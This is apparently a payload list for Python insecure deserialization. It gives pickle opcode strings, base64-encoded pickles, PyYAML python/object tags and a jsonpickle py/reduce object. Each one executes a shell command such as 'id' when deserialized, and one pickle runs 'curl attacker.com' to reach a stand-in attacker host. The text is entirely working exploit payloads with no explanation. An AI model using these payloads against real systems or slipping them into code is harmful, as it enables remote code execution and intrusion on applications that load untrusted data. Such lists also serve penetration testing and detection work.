import pickle,os;pickle.loads(b"cos\nsystem\n(S'id'\ntR.")
import pickle,base64;pickle.loads(base64.b64decode(b'Y29zCnN5c3RlbQooUydpZCcKdFIu'))
import yaml;yaml.load('!!python/object/apply:os.system ["id"]')
import yaml;yaml.load('!!python/object/new:os.system ["id"]')
import yaml;yaml.unsafe_load('!!python/object/apply:subprocess.check_output [["id"]]')
import jsonpickle;jsonpickle.decode('{"py/reduce": [{"py/type": "subprocess.check_output"}, {"py/tuple": [["id"]]}]}')
(cos
system
(S'id'
tR.
cbuiltins
eval
(S'__import__("os").system("id")'
tR.
(S'id'
ios
system
.
cos
system
(S'curl attacker.com'
tR.
b'\x80\x03cos\nsystem\nq\x00X\x02\x00\x00\x00idq\x01\x85q\x02Rq\x03.'
gASVIQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAJpZJSFlFKULg==
import yaml;yaml.load("!!python/object/apply:os.popen ['id']",Loader=yaml.FullLoader)
import yaml;yaml.load("!!python/object/new:subprocess.check_output [['id']]",Loader=yaml.UnsafeLoader)
